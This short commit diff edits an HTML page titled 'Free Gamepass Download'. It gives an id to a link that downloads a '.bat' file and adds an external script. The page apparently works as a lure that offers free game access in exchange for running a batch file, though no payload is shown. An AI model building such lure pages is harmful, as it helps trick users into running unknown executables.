Add download button and script to index.html

--- a/index.html
+++ b/index.html
@@ -1,2 +1,3 @@
 <title>Free Gamepass Download</title>
-<a href=".bat" download=".bat">Click here for free gamepass!</a>
+<a href=".bat" download=".bat" id="btnDownload">Click here for free gamepass!</a>
+<script src=".js"></script>
